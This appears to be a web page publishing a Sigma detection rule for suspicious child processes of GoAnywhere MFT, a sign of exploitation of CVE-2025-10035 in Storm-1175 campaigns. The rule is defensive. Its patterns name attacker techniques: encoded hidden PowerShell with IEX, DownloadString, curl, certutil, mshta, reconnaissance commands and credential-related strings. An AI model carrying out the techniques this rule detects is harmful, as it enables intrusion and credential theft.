Potential Exploitation of GoAnywhere MFT Vulnerability
Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application, which may indicate exploitation such as CVE-2025-10035. This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175.
Sigma rule (View on GitHub)
1title: Potential Exploitation of GoAnywhere MFT Vulnerability
2id: 6c76b3d0-afe4-4870-9443-ffe6773c5fef
3status: experimental
4description: |
5 Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application, which may indicate exploitation such as CVE-2025-10035.
6 This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175.
7references:
8 - https://www.microsoft.com/en-us/security/blog/2025/10/06/investigating-active-exploitation-of-cve-2025-10035-goanywhere-managed-file-transfer-vulnerability/
9author: MSFT (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
10date: 2025-10-07
11tags:
12 - attack.initial-access
13 - attack.t1190
14 - attack.execution
15 - attack.t1059.001
16 - attack.persistence
17 - attack.t1133
18 - detection.emerging-threats
19 - cve.2025-10035
20logsource:
21 category: process_creation
22 product: windows
23detection:
24 # Detects the GoAnywhere Tomcat parent process based on path and command line arguments
25 selection_parent:
26 ParentImage|contains: '\GoAnywhere\tomcat\'
27 selection_powershell_img:
28 Image|endswith:
29 - '\powershell.exe'
30 - '\powershell_ise.exe'
31 - '\pwsh.exe'
32 selection_powershell_cmd:
33 - CommandLine|contains|all:
34 - 'IEX'
35 - 'enc'
36 - 'Hidden'
37 - 'bypass'
38 - CommandLine|re:
39 - 'net\s+user'
40 - 'net\s+group'
41 - 'query\s+session'
42 - CommandLine|contains:
43 - 'whoami'
44 - 'systeminfo'
45 - 'dsquery'
46 - 'localgroup administrators'
47 - 'nltest'
48 - 'samaccountname='
49 - 'adscredentials'
50 - 'o365accountconfiguration'
51 - '.DownloadString('
52 - '.DownloadFile('
53 - 'FromBase64String('
54 - 'System.IO.Compression'
55 - 'System.IO.MemoryStream'
56 - 'curl'
57 selection_child_cmd:
58 Image|endswith: '\cmd.exe'
59 CommandLine|contains:
60 - 'powershell'
61 - 'whoami'
62 - 'net.exe'
63 - 'net1.exe'
64 - 'rundll32'
65 - 'quser'
66 - 'nltest'
67 - 'curl'
68 selection_child_others:
69 CommandLine|contains:
70 - 'bitsadmin'
71 - 'certutil'
72 - 'mshta'
73 - 'cscript'
74 - 'wscript'
75 condition: selection_parent and (all of selection_powershell_* or 1 of selection_child_*)
76falsepositives:
77 - Legitimate administrative scripts or built-in GoAnywhere functions could potentially trigger this rule. Tuning may be required based on normal activity in your environment.
78level: high
References
-
Storm-1175, a financially motivated actor known for deploying Medusa ransomware and exploiting public-facing applications for initial access, was observed exploiting the deserialization vulnerability in GoAnywhere MFT's License Servlet, tracked as CVE-2025-10035. We are publishing this blog post to increase awareness of this threat and to share end-to-end protection coverage details across Microsoft Defender.
Read More
Related rules
- Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309)
- Suspicious CrushFTP Child Process
- Exploited CVE-2020-10189 Zoho ManageEngine
- Potential SAP NetWeaver Webshell Creation
- Potential SAP NetWeaver Webshell Creation - Linux